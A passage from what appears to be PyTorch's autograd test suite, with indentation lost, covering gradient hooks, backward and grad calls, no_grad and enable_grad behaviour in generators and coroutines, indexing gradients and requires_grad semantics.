# Create a hook that do not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so the behavior of backward
# when variable is not part of the graph is as if allow_used were true
# x.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
